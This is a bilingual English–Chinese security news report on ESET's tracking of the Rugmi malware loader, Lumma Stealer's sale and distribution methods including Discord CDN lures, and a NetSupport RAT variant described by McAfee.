Rugmi恶意软件加载器：每日数百次检测

A new malware loader is being used by threat actors to deliver a wide range of information stealers such as Lumma Stealer (aka LummaC2), Vidar, RecordBreaker (aka Raccoon Stealer V2), and Rescoms.

威胁行为者正在使用新的恶意软件加载器传递各种信息窃取者，如Lumma Stealer（又名LummaC2），Vidar，RecordBreaker（又名Raccoon Stealer V2）和Rescoms。

Cybersecurity firm ESET is tracking the trojan under the name Win/TrojanDownloader.Rugmi.

网络安全公司ESET正在跟踪将特洛伊木马命名为Win/TrojanDownloader.Rugmi。

"This malware is a loader with three types of components: a downloader that downloads an encrypted payload, a loader that runs the payload from internal resources, and another loader that runs the payload from an external file on the disk," the company said in its Threat Report H2 2023.

该公司在其2023年下半年威胁报告中表示：“这种恶意软件是一种加载器，具有三种类型的组件：下载器下载加密的有效载荷，加载器从内部资源运行有效载荷，另一个加载器从磁盘上的外部文件运行有效载荷。”

Telemetry data gathered by the company shows that detections for the Rugmi loader spiked in October and November 2023, surging from single digit daily numbers to hundreds per day.

公司收集的遥测数据显示，Rugmi加载器的检测在2023年10月和11月激增，每天从个位数上升到数百个。

Stealer malware is typically sold under a malware-as-a-service (MaaS) model to other threat actors on a subscription basis. Lumma Stealer, for instance, is advertised in underground forums for $250 a month. The most expensive plan costs $20,000, but it also gives the customers access to the source code and the right to sell it.

窃取者恶意软件通常以恶意软件即服务（MaaS）模式出售，以订阅的方式提供给其他威胁行为者。例如，Lumma Stealer在地下论坛上以每月250美元的价格进行宣传。最昂贵的计划费用为20,000美元，但它还赋予客户访问源代码和出售的权利。

There is evidence to suggest that the codebase associated with Mars, Arkei, and Vidar stealers has been repurposed to create Lumma.

有证据表明，与Mars、Arkei和Vidar Stealers相关的代码库已被重新用于创建Lumma。

Besides continuously adapting its tactics to evade detection, the off-the-shelf tool is distributed through a variety of methods ranging from malvertising to fake browser updates to cracked installations of popular software such as VLC media player and OpenAI ChatGPT.

除了不断调整其策略以规避检测外，这个现成的工具通过各种方法进行分发，从恶意广告到虚假的浏览器更新再到破解安装流行软件（如VLC媒体播放器和OpenAI ChatGPT）。

Another technique concerns the use of Discord's content delivery network (CDN) to host and propagate the malware, as revealed by Trend Micro in October 2023.

另一种技术涉及使用Discord的内容传递网络（CDN）来托管和传播恶意软件，正如Trend Micro在2023年10月揭示的那样。

This entails leveraging a combination of random and compromised Discord accounts to send direct messages to prospective targets, offering them $10 or a Discord Nitro subscription in exchange for their assistance on a project.

这涉及利用随机和受损的Discord帐户的组合向潜在目标发送直接消息，向他们提供10美元或Discord Nitro订阅以换取他们在项目上的帮助。

Users who agree to the offer are then urged to download an executable file hosted on Discord CDN that masquerades as iMagic Inventory but, in reality, contains the Lumma Stealer payload.

同意该提议的用户然后被敦促下载托管在Discord CDN上的可执行文件，伪装成iMagic Inventory，但实际上包含Lumma Stealer有效载荷。

"Ready-made malware solutions contribute to the proliferation of malicious campaigns because they make the malware available even to potentially less technically skilled threat actors," ESET said.

ESET表示：“现成的恶意软件解决方案有助于恶意活动的传播，因为它们使恶意软件即使对可能技术水平较低的威胁行为者也可用。”

"Offering a broader range of functions then serves to render Lumma Stealer even more attractive as a product."

“提供更广泛的功能更使Lumma Stealer成为一个更有吸引力的产品。”

The disclosures come as McAfee Labs disclosed a new variant of NetSupport RAT, which emerged from its legitimate progenitor NetSupport Manager and has since been put to use by initial access brokers to gather information and perform additional actions on victims of interest.

这些披露是在McAfee Labs披露了NetSupport RAT的新变种之际，该变种源自其合法的前身NetSupport Manager，并且此后已被初始访问经纪人用于收集信息和对感兴趣的受害者执行其他操作。

"The infection begins with obfuscated JavaScript files, serving as the initial point of entry for the malware," McAfee said, adding it highlights the "evolving tactics employed by cybercriminals."

“感染始于经过混淆的JavaScript文件，充当恶意软件的初始入口点。”McAfee表示，并补充说这突显了“网络罪犯采用的不断发展的策略。”

The execution of the JavaScript file advances the attack chain by running PowerShell commands to retrieve the remote control and stealer malware from an actor-controlled server. The campaign's primary targets include the U.S. and Canada.

JavaScript文件的执行通过运行PowerShell命令从由行动者控制的服务器检索远程控制和窃取者恶意软件来推进攻击链。该活动的主要目标包括美国和加拿大。

原文始发于微信公众号（知机安全）：Rugmi恶意软件加载器：每日数百次检测